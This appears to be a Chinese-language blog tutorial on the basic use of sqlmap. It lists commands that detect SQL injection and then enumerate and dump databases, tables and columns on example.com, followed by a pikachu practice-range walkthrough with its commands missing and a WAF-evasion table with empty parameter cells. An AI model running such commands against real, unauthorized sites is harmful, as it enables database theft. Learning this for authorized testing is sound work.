SQL注入-sqlmap的基础使用
⚠️法律声明
本文内容仅供网络安全技术学习与授权测试。任何未经授权使用文中技术的行为均属违法。
作者不承担任何因使用者违法行为导致的后果。请严格遵守法律法规,合法使用技术。
“知识无罪,使用者的选择决定一切。”
sqlmap 是一款开源的自动化 SQL 注入检测与利用工具,用 Python 编写。它能够自动识别目标网站或数据库中的 SQL 注入漏洞,并提供数据提取、文件读写、命令执行等高级利用功能。(本文使用kali中自带的sqlmap,如需要在windows平台使用,可在github中免费获取)
主要特点:
- 支持多种数据库:MySQL、Oracle、SQL Server、PostgreSQL 等
- 多种注入技术:布尔盲注、时间盲注、报错注入、联合查询、堆叠查询等
- 自动探测:自动识别注入点、数据库类型、权限等
- 功能丰富:数据脱库、读写文件、获取 shell、绕过 WAF 等
- 可扩展:支持自定义 Payload 和 Tamper 脚本
常用命令
检测URL是否存在SQL注入 sqlmap -u "http://example.com/page?id=1" 批量检测URL是否存在SQL注入(urls文件为rul列表,一行一个) sqlmap -m urls.txt --batch 从文件中读取请求(含Cookie、Header等) sqlmap -r request.txt 使用POST方式提交数据 sqlmap -u "http://example.com/login" --data="user=admin&pass=123" 获取所有数据库名 sqlmap -u "http://example.com/page?id=1" --dbs 获取当前数据库名 sqlmap -u "http://example.com/page?id=1" --current-db 获取指定数据库的所有表名 sqlmap -u "http://example.com/page?id=1" -D database_name --tables 获取指定表的所有列名 sqlmap -u "http://example.com/page?id=1" -D database_name -T table_name --columns 获取指定列的所有数据 sqlmap -u "http://example.com/page?id=1" -D database_name -T table_name -C username --dumppikachu靶场案例
打开本地搭建好的靶场(也可以使用网络上公开的靶场)
打开burp代理,开启抓包
抓到后,确保被捕获的包是你想要的
这里照顾linux基础薄弱的师傅,直接进行创建文件,清晰易懂,不使用命令行。
在kali中创建文本文件,把抓到的数据包的数据复制到里面,保存(需注意,本地靶场的host不要用127.0.0.1)
输入以下命令,得到结果,使用MySQL数据库且版本大于5.0 Apache2.4.23版本 PHP5.4.45版本
输入以下命令,得到所有数据库
输入以下命令,得到pikachu数据库的所有表
输入以下命令,得到pikachu数据库的users表的所有列
输入以下命令,得到pikachu数据库的users表的password和username列的数据
至此完成拖库,后续不再进行
扩展参数
绕过防御类(WAF/IPS/防火墙)
功能 | 参数 | 说明 |
延时躲避 |
| 每次请求间隔2秒,防频率封禁 |
随机User-Agent |
| 每次请求换UA,避免特征识别 |
代理轮换 |
| 配合Burp/代理池使用 |
请求伪装 |
| 伪造来源页面 |
自定义逃逸脚本 |
| 绕过WAF关键字检测(内置几十种脚本) |
参数污染 |
| HTTP参数污染,绕过某些WAF |
win中使用sqlmap基础语法
# 1. 获取服务器信息,包括操作系统、数据库、web容器、后端语言 python sqlmap.py -u url # 2. 获取数据库名称列表 python sqlmap.py -u url -dbs # 3. 获取当前数据库名称 python sqlmap.py -u url --current-db # 4. 获取当前数据库中所有表的名称 python sqlmap.py -u url -D 数据库名 --tables # 5. 获取当前数据库指定的表的字段名 python sqlmap.py -u url -D 数据库名 -T 表名 --columns # 6. 获取指定库指定表指定字段的值 python sqlmap.py -u url -D 数据库名 -T 表名 -C 字段名1,字段名2... --dump
)
